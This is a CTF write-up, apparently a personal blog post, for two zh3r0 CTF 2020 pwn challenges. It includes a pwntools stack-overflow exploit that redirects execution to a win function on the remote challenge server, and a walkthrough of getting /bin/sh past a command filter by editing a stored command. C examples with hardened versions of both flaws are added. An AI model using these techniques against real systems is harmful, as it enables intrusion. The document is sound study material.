kanyewest CTF

Notes on things I've been studying.

zh3r0 CTF 2020 [Write-up]

Free Flag

$ file chall 
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=518d3397ca0a0d5e98e900e3f2e2937de34e3554, not stripped
$ checksec.sh --file=./chall 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   72 Symbols     No       0               1       ./chall
$ ./chall 
Welcome to zh3r0 ctf.
Please provide us your name: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (コアダンプ)

This shows there is a buffer overflow (BOF).

gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000400598  _init
0x00000000004005c0  puts@plt
0x00000000004005d0  system@plt
0x00000000004005e0  alarm@plt
0x00000000004005f0  read@plt
0x0000000000400600  setvbuf@plt
0x0000000000400610  exit@plt
0x0000000000400620  _start
0x0000000000400650  _dl_relocate_static_pie
0x0000000000400660  deregister_tm_clones
0x0000000000400690  register_tm_clones
0x00000000004006d0  __do_global_dtors_aux
0x0000000000400700  frame_dummy
0x0000000000400707  win_win
0x000000000040071a  here
0x000000000040076e  init
0x00000000004007d9  main
0x0000000000400800  __libc_csu_init
0x0000000000400870  __libc_csu_fini
0x0000000000400874  _fini
gdb-peda$ pdisas win_win
Dump of assembler code for function win_win:
   0x0000000000400707 <+0>:     push   rbp
   0x0000000000400708 <+1>:     mov    rbp,rsp
   0x000000000040070b <+4>:     lea    rdi,[rip+0x172]        # 0x400884
   0x0000000000400712 <+11>:    call   0x4005d0 <system@plt>
   0x0000000000400717 <+16>:    nop
   0x0000000000400718 <+17>:    pop    rbp
   0x0000000000400719 <+18>:    ret    
End of assembler dump.
gdb-peda$ x/s 0x400884
0x400884:       "cat flag.txt"
gdb-peda$

Debugging it in gdb shows a function named win_win; calling it runs system("cat flag.txt").

The exploit code is below.

from pwn import *

e = ELF('./chall')
#p = process('./chall')
p = remote('us.pwn.zh3r0.ml', 3456)

win = e.symbols['win_win']        # address of win_win (No PIE, so it is fixed)
ret_addr = 0x004005ae             # a lone `ret`; keeps rsp 16-byte aligned before system()

payload = b'A' * 40               # padding up to the saved return address
payload += p64(ret_addr)
payload += p64(win)

print(p.recvuntil(b'name:'))
p.sendline(payload)
p.interactive()

$ python solve.py 
[*]
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to us.pwn.zh3r0.ml on port 3456: Done
Welcome to zh3r0 ctf.
Please provide us your name:
[*] Switching to interactive mode
 
zh3r0{welcome_to_zh3r0_ctf}

[*] Got EOF while reading in interactive
$ 
[*] Closed connection to us.pwn.zh3r0.ml port 3456
[*] Got EOF while sending in interactive
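For the defensive side of the crash above, here is an added C illustration (not the challenge's source, whose buffer size is not shown; NAME_LEN is a constructed value). It places the unbounded read() pattern that produces this kind of stack overflow next to a bounded reader, and drives the bounded reader through a pipe with a constructed 200-byte name so the behaviour can be checked offline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed size for the illustration; the challenge's real buffer size is not shown. */
#define NAME_LEN 32

/* The pattern behind the crash above (added illustration, not the challenge's source):
 * read() is allowed to write far more than the stack buffer holds, so a long name
 * runs over the saved rbp and return address stored just above `name`. */
ssize_t read_name_unbounded(int fd, char *name /* NAME_LEN bytes */) {
    return read(fd, name, 256);   /* 256 > NAME_LEN: stack buffer overflow */
}

/* Hardened form: the read count is derived from the buffer size, one byte is reserved
 * for the terminator, and the trailing newline a terminal or sendline() adds is stripped.
 * Returns the length of the stored name, or -1 on error. */
ssize_t read_name_bounded(int fd, char *name, size_t name_len) {
    if (name_len == 0) return -1;
    ssize_t n = read(fd, name, name_len - 1);
    if (n < 0) return -1;
    name[n] = '\0';
    if (n > 0 && name[n - 1] == '\n') name[--n] = '\0';
    return n;
}

/* Self-contained driver: pushes `input_len` 'A's plus a newline (constructed input
 * standing in for the long name typed above) through a pipe and returns how many
 * bytes the bounded reader kept. The excess stays unread in the pipe instead of
 * landing on the stack. */
ssize_t demo_bounded_read(size_t input_len) {
    int fds[2];
    char name[NAME_LEN];
    ssize_t n = -1;
    if (pipe(fds) != 0) return -1;
    char *input = malloc(input_len + 1);
    if (input) {
        memset(input, 'A', input_len);
        input[input_len] = '\n';
        if (write(fds[1], input, input_len + 1) == (ssize_t)(input_len + 1)) {
            close(fds[1]);
            fds[1] = -1;
            n = read_name_bounded(fds[0], name, sizeof name);
        }
        free(input);
    }
    if (fds[1] != -1) close(fds[1]);
    close(fds[0]);
    return n;
}

int main(void) {
    printf("200-byte name -> %zd bytes kept (buffer holds at most %d)\n",
           demo_bounded_read(200), NAME_LEN - 1);
    printf("5-byte name   -> %zd bytes kept\n", demo_bounded_read(5));
    return 0;
}
```

The key design point is that the count handed to read() comes from sizeof the destination rather than from a constant chosen independently of it; a stack canary (which checksec reports as absent here) would only turn the overwrite into an abort, whereas the bounded read prevents it.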

Command-1

command_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a90b629e4472aa6f35d5749a3bf1cab50f8bdb5a, not stripped
$ checksec.sh --file=command_1
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   86 Symbols     Yes      0               4       command_1
$ ./command_1 
Please enter your name: AAAA
Hello AAAA

-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> /bin/sh
I don't see where you are going you idiot

Entering "/bin/sh" at 1.) Add command is, naturally, rejected. However, if you first Add some arbitrary string and then Edit it, you can enter whatever command you like. That's all there is to it.

$ ./command_1 
Please enter your name: 1
Hello 1

-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> AAA
Command added at index [0]
.-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 3
Enter index you want to edit: 
0        
Enter new command -> /bin/sh
Command edited.
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 2
So you want to run the command:
Enter the index of the command: ls
$ id
$ nc us.pwn.zh3r0.ml 8520
Please enter your name: tekashi
Hello tekashi

-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> ls
Command added at index [0]
.-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 3
Enter index you want to edit: 
0     
Enter new command -> cat "flag.txt"
Command edited.
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 2
So you want to run the command:
Enter the index of the command: 0
zh3r0{the_intended_sol_useoverflow_change_nextpointer_toFakechunk_in_bssname}
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
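The Add/Edit inconsistency in Command-1 is a classic case of validating one write path but not another. As an added C illustration (not the challenge's code; the allow-list, the array sizes and the function names are constructed for the example), here is a minimal command store with a weak edit that mirrors the bypass, a fixed edit that routes through the same policy check as add, and a point-of-use check so that nothing reaches system() without being validated regardless of how it was stored.

```c
#include <stdio.h>
#include <string.h>

#define MAX_CMDS 8
#define CMD_LEN 64

static char commands[MAX_CMDS][CMD_LEN];
static int command_count = 0;

void reset_commands(void) {
    memset(commands, 0, sizeof commands);
    command_count = 0;
}

const char *get_command(int idx) {
    return (idx >= 0 && idx < command_count) ? commands[idx] : NULL;
}

/* The single policy decision. Constructed allow-list of exact command names (the
 * challenge's real filter is not shown). An allow-list is preferable to rejecting
 * known-bad strings, which has to enumerate every dangerous input in advance. */
int command_allowed(const char *cmd) {
    static const char *const allowed[] = { "ls", "date", "whoami" };
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(cmd, allowed[i]) == 0) return 1;
    return 0;
}

/* Copies cmd into slot idx; rejects strings that would not fit. */
static int store(int idx, const char *cmd) {
    if (strlen(cmd) >= CMD_LEN) return -1;
    strcpy(commands[idx], cmd);   /* length checked above */
    return idx;
}

/* Add validates, as the menu above does. Returns the new index or -1. */
int add_command(const char *cmd) {
    if (command_count >= MAX_CMDS || !command_allowed(cmd)) return -1;
    return store(command_count++, cmd);
}

/* Weak edit, mirroring the bypass: only the index is checked, so any string goes in. */
int edit_command_weak(int idx, const char *cmd) {
    if (idx < 0 || idx >= command_count) return -1;
    return store(idx, cmd);
}

/* Fixed edit: every path that changes what will later run goes through the same check. */
int edit_command_fixed(int idx, const char *cmd) {
    if (idx < 0 || idx >= command_count || !command_allowed(cmd)) return -1;
    return store(idx, cmd);
}

/* Point-of-use check: whatever path stored the string, it is re-validated right
 * before it would be handed to system(). Returns 0 if it would run, -1 if refused. */
int run_command(int idx) {
    const char *cmd = get_command(idx);
    if (!cmd || !command_allowed(cmd)) return -1;
    /* system(cmd) would go here; the example only reports the decision. */
    return 0;
}

int main(void) {
    add_command("ls");
    edit_command_weak(0, "/bin/sh");
    printf("weak edit stored \"%s\"; run_command -> %d\n", get_command(0), run_command(0));
    reset_commands();
    add_command("ls");
    int rc = edit_command_fixed(0, "/bin/sh");
    printf("fixed edit rc=%d; stored \"%s\"; run_command -> %d\n", rc, get_command(0), run_command(0));
    return 0;
}
```

The two layers are deliberately redundant: the fixed edit closes the path used in the write-up, and run_command catches any further mutation path (including memory corruption of the stored string, which the flag text hints was the intended route) because the decision is made at the moment of use rather than at the moment of storage.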